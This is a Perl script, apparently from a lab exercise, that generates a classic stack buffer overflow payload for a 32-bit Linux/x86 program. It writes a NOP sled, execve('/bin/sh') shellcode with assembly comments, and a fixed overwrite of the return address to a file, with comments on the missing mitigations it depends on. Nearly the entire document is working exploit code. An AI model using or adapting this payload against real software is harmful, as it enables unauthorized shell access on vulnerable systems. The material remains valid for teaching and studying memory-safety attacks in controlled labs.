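#!/usr/bin/perl
# Builds the input file for a stack-smashing exercise against a 32-bit
# Linux/x86 target: NOP padding, then shellcode, then the value that
# overwrites the saved return address. The bytes are written unmodified
# to ./payload_divulge.
#
# The layout depends on the target running without the usual mitigations;
# any one of these is enough to break it:
#   - ASLR: the return address below is a fixed stack address.
#   - Non-executable stack (NX): the shellcode is placed in writebuf, whose
#     address is just below the stack bottom, and is executed from there.
#   - Stack protector: NOTE(review) a canary sitting before the saved
#     return address would be overwritten by the padding first; confirm
#     how the victim binary was built.
use strict;
use warnings;

# Shellcode for spawning a new shell in the victim's machine.
# It builds the string "//bin/sh" on the stack and issues system call
# 0xb through int $0x80.
my $shellcode =
      "\x31\xc0"                # xorl  %eax, %eax
    . "\x50"                    # pushl %eax
    . "\x68\x6e\x2f\x73\x68"    # pushl $0x68732f6e
    . "\x68\x2f\x2f\x62\x69"    # pushl $0x69622f2f
    . "\x89\xe3"                # movl  %esp, %ebx
    . "\x99"                    # cltd
    . "\x52"                    # pushl %edx
    . "\x53"                    # pushl %ebx
    . "\x89\xe1"                # movl  %esp, %ecx
    . "\xb0\x0b"                # movb  $0xb, %al
    . "\xcd\x80";               # int   $0x80

# Address of the bottom of the stack = 0xBFFFF080
# Address of the writebuf            = 0xbfffe990
# Offset between the two addresses   = 0x6f0
# This value must match writebuf's address in the victim process. It is
# stored least-significant byte first, as x86 expects.
my $retaddr = "\x90\xe9\xff\xbf";    # 0xbfffe990

# Fill with NOP instructions. 244 bytes of padding plus the 24-byte
# shellcode put $retaddr at offset 268 of the input.
# NOTE(review): presumably 268 is the distance from writebuf to the saved
# return address in the victim's frame; confirm against the target.
my $pad = "\x90" x 244;

# Input string to our victim's program.
my $arg = $pad . $shellcode . $retaddr;

# Store the input string in a file. Three-argument open with a lexical
# handle keeps the file name from being parsed as a mode, ':raw' keeps any
# I/O layer from rewriting bytes, and every step is checked so a short or
# failed write is not mistaken for a complete payload file.
my $payload_file = 'payload_divulge';
open my $out, '>:raw', $payload_file
    or die "open $payload_file: $!";
print {$out} $arg
    or die "write $payload_file: $!";
close $out
    or die "close $payload_file: $!";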